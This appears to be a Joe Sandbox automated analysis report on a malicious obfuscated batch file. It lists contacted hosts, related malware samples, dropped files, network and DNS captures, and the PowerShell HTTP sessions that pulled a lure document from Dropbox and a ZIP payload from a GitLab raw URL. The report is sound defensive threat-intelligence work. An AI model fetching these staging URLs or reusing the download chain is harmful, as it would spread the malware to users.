                                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://gitlab.com/powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://help.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | ASN | ASN Name | Malicious
172.65.251.78 | gitlab.com | United States | 13335 | CLOUDFLARENET US | false
162.125.69.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOX US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578271
Start date and time: 2024-12-19 14:12:14 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hngadsfkgj17.bat
Detection: MAL
Classification: mal88.troj.evad.winBAT@30/16@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 14
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 2012 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5260 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5272 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: hngadsfkgj17.bat
Time | Type | Description
08:13:22 | API Interceptor | 66x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.65.15
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSRECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                          • 1.8.182.26
                                                                                                                                                                                                                          StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                          • 104.21.78.102
                                                                                                                                                                                                                          https://nicholaspackaging.businesslawcloud.com/mTlFMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.18.11.207
                                                                                                                                                                                                                          fAatfRnCZ5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.21.21.198
                                                                                                                                                                                                                          1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                          • 104.21.78.102
                                                                                                                                                                                                                          http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.18.86.42
                                                                                                                                                                                                                          DROPBOXUSQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.4.18
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.15
                                                                                                                                                                                                                          RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.21.1
                                                                                                                                                                                                                          hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.65.18
                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                          • 162.125.113.170
                                                                                                                                                                                                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eQhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          g1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.125.69.18
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                          Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Nlllulmll:NllU
                                                                                                                                                                                                                          MD5:8238A428604DFCBB76A63390CD65BBDE
                                                                                                                                                                                                                          SHA1:A4DA8D52DFE36DEB522DCAE7654E94B2F8391A57
                                                                                                                                                                                                                          SHA-256:E8E3F8A61FAA25DC1F29646A3E573345812BC15720CFC195094D9AD37C82A012
                                                                                                                                                                                                                          SHA-512:061B3CCBA39A1E40BDF95D1D612B220B9C3C395DCC3249E9D03AF0B5ED92AAF770127849CBE0C5E41BEA342C54368E2294EA775DC37F5239DFAF4DBB557E79AE
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:@...e...........................................................
                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):14
Entropy (8bit):3.521640636343319
Encrypted:false
SSDEEP:3:Mrv:gv
MD5:CE585C6BA32AC17652D2345118536F9C
SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
Malicious:false
Preview:ECHO is off...
Process:C:\Windows\System32\find.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):36
Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                          MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                          SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                          SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                          SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                                          File type:Non-ISO extended-ASCII text, with very long lines (1572), with LF, NEL line terminators, with escape sequences
                                                                                                                                                                                                                          Entropy (8bit):5.7595402735645145
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • MP3 audio (1001/1) 100.00%
                                                                                                                                                                                                                          File name:hngadsfkgj17.bat
                                                                                                                                                                                                                          File size:34'400 bytes
                                                                                                                                                                                                                          MD5:6c35c77c00bba44f2d86d74cd3e6a3de
                                                                                                                                                                                                                          SHA1:82e5786895b0ddc0418699d2d980c818406d8063
                                                                                                                                                                                                                          SHA256:61e9db26c03e7850f014dff5430495ada8406aea46fc4fbe237b68d3abc8e59d
                                                                                                                                                                                                                          SHA512:3e97a481b310571687dc02d0a5e928a687b8ca0d4fea357997462b97c148e4bf38c8ac4523e0f7edb15965276f69976ab2a7703405edb1ac076e19a5d41c2542
                                                                                                                                                                                                                          SSDEEP:384:ojpf16DrfdlD9BAt+qw+5B8XUcltcPSI1MzITrHLS57GlnTAtnB61:upfcDrf/D9Gt+L+5B8XRltcPSqYj6
                                                                                                                                                                                                                          TLSH:E4F29F1A7693BD4DE46EC375D28110B6A1CE783EB97F5863403E31BEBBB011A5B458B0
                                                                                                                                                                                                                          File Content Preview:....>nul 2>&1 &cls.;@;@e^c%...............^...%%............^......%%...............^...%ho of%...^..............%%......^............%^f&f^%...( ..._...)......(......_...)......(......_...)...(.........)...( ..._...)......^(......_...)...%%...( ..._...).
                                                                                                                                                                                                                          Icon Hash:9686878b929a9886
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 14:13:23.633236885 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:23.633301973 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:23.633424044 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:23.641711950 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:23.641743898 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:25.072324991 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:25.072436094 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:25.074343920 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:25.074352980 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:25.074661016 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:25.082024097 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:25.123328924 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:26.109827042 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:26.109997034 CET | 443 | 49721 | 162.125.69.18 | 192.168.2.6
Dec 19, 2024 14:13:26.110028028 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:26.110702038 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:26.122500896 CET | 49721 | 443 | 192.168.2.6 | 162.125.69.18
Dec 19, 2024 14:13:30.813496113 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:30.813543081 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:30.813786030 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:30.816509962 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:30.816533089 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.036772013 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.036982059 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.038870096 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.038887024 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.039158106 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.048746109 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.091339111 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.628323078 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.628387928 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.628477097 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.628495932 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.628520966 CET | 443 | 49738 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.628572941 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.634855986 CET | 49738 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.635683060 CET | 49744 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.635736942 CET | 443 | 49744 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.635981083 CET | 49744 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.636147022 CET | 49744 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.636162996 CET | 443 | 49744 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:32.713619947 CET | 49744 | 443 | 192.168.2.6 | 172.65.251.78
Dec 19, 2024 14:13:32.755331039 CET | 443 | 49744 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:33.848299026 CET | 443 | 49744 | 172.65.251.78 | 192.168.2.6
Dec 19, 2024 14:13:33.848366976 CET | 49744 | 443 | 192.168.2.6 | 172.65.251.78
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 14:13:23.490469933 CET | 50455 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 14:13:23.627548933 CET | 53 | 50455 | 1.1.1.1 | 192.168.2.6
Dec 19, 2024 14:13:26.124356031 CET | 57004 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 14:13:26.411411047 CET | 53 | 57004 | 1.1.1.1 | 192.168.2.6
Dec 19, 2024 14:13:30.665138960 CET | 57762 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 14:13:30.808206081 CET | 53 | 57762 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 14:13:23.490469933 CET | 192.168.2.6 | 1.1.1.1 | 0x57f7 | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:13:26.124356031 CET | 192.168.2.6 | 1.1.1.1 | 0x288 | Standard query (0) | ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:13:30.665138960 CET | 192.168.2.6 | 1.1.1.1 | 0x9f1b | Standard query (0) | gitlab.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 14:13:23.627548933 CET | 1.1.1.1 | 192.168.2.6 | 0x57f7 | No error (0) | www.dropbox.com | www-env.dropbox-dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 14:13:23.627548933 CET | 1.1.1.1 | 192.168.2.6 | 0x57f7 | No error (0) | www-env.dropbox-dns.com |  | 162.125.69.18 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:13:26.411411047 CET | 1.1.1.1 | 192.168.2.6 | 0x288 | No error (0) | ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 14:13:26.411411047 CET | 1.1.1.1 | 192.168.2.6 | 0x288 | No error (0) | edge-block-www-env.dropbox-dns.com |  | 162.125.69.15 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 14:13:30.808206081 CET | 1.1.1.1 | 192.168.2.6 | 0x9f1b | No error (0) | gitlab.com |  | 172.65.251.78 | A (IP address) | IN (0x0001) | false
• www.dropbox.com
• gitlab.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 162.125.69.18 | 443 | 5272 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 13:13:25 UTC | 192 | OUT | GET /scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1 HTTP/1.1
Host: www.dropbox.com
Connection: Keep-Alive
2024-12-19 13:13:26 UTC | 4091 | IN | HTTP/1.1 302 Found
Content-Security-Policy: media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/present [TRUNCATED]
Content-Type: text/html; charset=utf-8
Location: https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAw5xZa7Q5hKqVTa89ndGogNav1Efbjjd4JGvg80xoHwtB2646VZyPZAja7QxjnPwJAzSxLGw2iKfSbU_JcRlxGELUaMwLFCoE7DM4MlEEYJeRNURq2X63NC3vPq8QW/file?dl=1#
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Set-Cookie: gvc=MjMyMTAzMDU5NjYyNzYyMTc1NTI4ODIyODcwOTQ1NzU0MTkzNjg2; Path=/; Expires=Tue, 18 Dec 2029 13:13:25 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: t=eK5Oy0kF8O6KPy2vKz7erm0b; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 13:13:25 GMT; HttpOnly; Secure; SameSite=None
Set-Cookie: __Host-js_csrf=eK5Oy0kF8O6KPy2vKz7erm0b; Path=/; Expires=Fri, 19 Dec 2025 13:13:25 GMT; Secure; SameSite=None
Set-Cookie: __Host-ss=GuhY1p_exQ; Path=/; Expires=Fri, 19 Dec 2025 13:13:25 GMT; HttpOnly; Secure; SameSite=Strict
Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 13:13:25 GMT
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                          X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                          Content-Length: 17
                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:13:25 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                          Server: envoy
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                                                                                                          X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                          X-Dropbox-Request-Id: 81f779b4965346748db7e6a4abd6bbc6
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-12-19 13:13:26 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                          Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49738 | 172.65.251.78 | 443 | 5260 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-19 13:13:32 UTC | 95 bytes | OUT
GET /garvdsf/dsfg/-/raw/main/FGa1712.zip HTTP/1.1
Host: gitlab.com
Connection: Keep-Alive
2024-12-19 13:13:32 UTC | 453 bytes | IN
HTTP/1.1 302 Found
Date: Thu, 19 Dec 2024 13:13:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://gitlab.com/users/sign_in
CF-Ray: 8f47a688fde0ef9d-EWR
CF-Cache-Status: MISS
Cache-Control: no-cache
Set-Cookie: _gitlab_session=13c935dd1f14529e277b183bc3a87758; path=/; expires=Thu, 19 Dec 2024 15:13:32 GMT; secure; HttpOnly; SameSite=None
Strict-Transport-Security: max-age=31536000
2024-12-19 13:13:32 UTC | 2134 bytes | IN
